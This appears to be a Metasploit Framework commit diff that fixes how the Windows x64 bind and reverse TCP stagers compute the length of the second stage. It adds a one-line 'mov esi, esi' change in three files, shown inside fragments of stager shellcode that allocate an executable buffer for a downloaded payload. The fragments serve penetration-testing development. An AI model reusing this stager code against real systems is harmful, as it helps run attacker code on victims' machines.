Fix #5988, windows x64 stagers

* Also, use mov esi, esi to save an extra byte * Also, modify the block_recv.asm code, just to have it up to date
2015-09-28 15:52:50 -05:00 · 2015-09-28 15:52:50 -05:00 · 9444c8c410
parent b206de7708
commit 9444c8c410
3 changed files with 3 additions and 1 deletions
--- a/external/source/shellcode/windows/x64/src/block/block_recv.asm
+++ b/external/source/shellcode/windows/x64/src/block/block_recv.asm
@ -24,6 +24,7 @@ recv:
  add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next
  ; Alloc a RWX buffer for the second stage
  pop rsi                ; pop off the second stage length
+  mov esi, esi           ; only use the lower-order 32 bits for the size
  push byte 0x40         ; 
  pop r9                 ; PAGE_EXECUTE_READWRITE
  push 0x1000            ; 
--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@ -220,6 +220,7 @@ module Payload::Windows::BindTcp_x64

        ; Alloc a RWX buffer for the second stage
        pop rsi                ; pop off the second stage length
+        mov esi, esi           ; only use the lower-order 32 bits for the size
        push 0x40              ; 
        pop r9                 ; PAGE_EXECUTE_READWRITE
        push 0x1000            ; 
--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@ -219,7 +219,7 @@ module Payload::Windows::ReverseTcp_x64

      ; Alloc a RWX buffer for the second stage
        pop rsi                 ; pop off the second stage length
-        movsxd rsi, esi         ; only use the lower-order 32 bits for the size
+        mov esi, esi            ; only use the lower-order 32 bits for the size
        push 0x40               ; 
        pop r9                  ; PAGE_EXECUTE_READWRITE
        push 0x1000             ;